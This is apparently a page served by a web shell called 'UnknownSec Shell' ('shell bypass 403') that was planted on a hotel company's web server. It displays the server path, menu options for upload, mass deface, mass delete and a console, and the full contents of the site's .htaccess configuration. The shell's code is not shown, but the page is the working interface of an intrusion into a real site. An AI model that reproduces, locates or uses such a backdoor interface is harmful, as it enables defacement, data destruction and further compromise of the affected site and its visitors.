shell bypass 403
UnknownSec Shell
:
/
home
/
sokha
/
public_html
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
.htaccess
RewriteEngine On #RewriteCond %{HTTPS} off #RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L] #php_value zlib.output_compression off # Add Proper MIME-Type for Favicon AddType image/x-icon .ico # Expires headers ExpiresActive on # Set default to 30 days ExpiresDefault A2592000 # Set static content to 4 weeks <FilesMatch "\.(gif|jpeg|jpg|swf|html|htm|xml|png|css|js|ico)$"> ExpiresDefault "access plus 1 weeks" #ExpiresDefault "access plus 4 weeks" </FilesMatch> # Turn of Etags Header unset ETag FileETag None <IfModule mod_deflate.c> AddOutputFilterByType DEFLATE text/text text/html text/plain text/xml text/css application/x-javascript application/javascript # Netscape 4.x has some problems... BrowserMatch ^Mozilla/4 gzip-only-text/html # Netscape 4.06-4.08 have some more problems BrowserMatch ^Mozilla/4\.0[678] no-gzip # MSIE masquerades as Netscape, but it is fine BrowserMatch \bMSIE !no-gzip !gzip-only-text/html # Do NOT compress localhost #SetEnvIf Remote_Host 127.0.0.1 no-gzip # Make sure proxies don't deliver the wrong content Header append Vary User-Agent env=!dont-vary </IfModule> <IfModule mod_rewrite.c> RewriteEngine On #RewriteBase / IndexIgnore *.gif *.jpg .*png RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{SCRIPT_FILENAME} !-d RewriteCond %{SCRIPT_FILENAME} !-f RewriteRule ^(img/.*)$ webroot/$1 [QSA,L] RewriteRule ^(js/.*)$ webroot/$1 [QSA,L] RewriteRule ^(css/.*)$ webroot/$1 [QSA,L] RewriteRule ^(files/.*)$ webroot/$1 [QSA,L] RewriteRule ^beta/sokha-vip\/?$ http://www.sokhahotels.com/vip RewriteRule ^[a-z\-\/]+career/(.*) http://www.sokhahotels.com/corporate-office/page/career/$1 RewriteRule ^career/(.*) https://www.sokhahotels.com/corporate-office/page/career/$1 RewriteRule ^career https://www.sokhahotels.com/corporate-office/page/career RewriteRule ^blog https://www.sokhahotels.com/ RewriteRule ^bayon https://www.sokhahotels.com/ RewriteRule ^taprohm https://www.sokhahotels.com/ RewriteRule ^signature\/?$ https://www.sokhahotels.com/signature/index.php RewriteRule ^index.html https://www.sokhahotels.com/index.php #RewriteRule ^hotspot/? https://www.sokhahotels.com/hotspot/index.html #RewriteRule ^foto-contest https://www.sokhahotels.com/foto-contest/index.php RewriteRule ^residence/?$ residence/index.html [QSA,L] # RewriteRule ^kampot/?$ https://www.sokhahotels.com/kampot/index.php [QSA,L] RewriteRule ^([a-zA-Z\-0-9]+)\/?$ index.php?controller=$1 RewriteRule ^([a-z\-0-9]+)\/([a-z\-0-9]+)\/?$ index.php?controller=$1&action=$2 RewriteRule ^([a-z\-0-9]+)\/([a-z\-0-9]+)\/([a-z\-0-9A-Z\=\$]+)\/?$ index.php?controller=$1&action=$2&id=$3 RewriteRule ^([a-z\-0-9]+)\/([a-z\-0-9]+)\&hiddenCode=([a-z\-0-9A-Z\=\$\*]+)\/?$ index.php?controller=$1&action=$2&id=$3 RewriteRule ^([a-z\-0-9]+)\/([a-z\-0-9]+)\/([a-z\-0-9A-Z\=]+)\/([a-z\-0-9A-Z\=]+)\/?$ index.php?controller=$1&action=$2&id=$3&id2=$4 #RewriteRule ^([a-z\-0-9]+)\/([a-z\-0-9]+)\/([a-z\-0-9A-Z\=]+)\/([a-z\-0-9A-Z\=\&\$]+)?$ index.php?controller=$1&action=$2&id=$3&$4 #RewriteRule ^(.*)$ index.php </IfModule> ErrorDocument 404 /pages/error404 # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php56” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php56 .php .php5 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit RewriteCond %{HTTP_HOST} ^sokhahotels\.com$ [OR] RewriteCond %{HTTP_HOST} ^www\.sokhahotels\.com$ RewriteRule ^/?$ "https\:\/\/sokhahotels\.com\.kh\/" [R=301,L]
© 2025 UnknownSec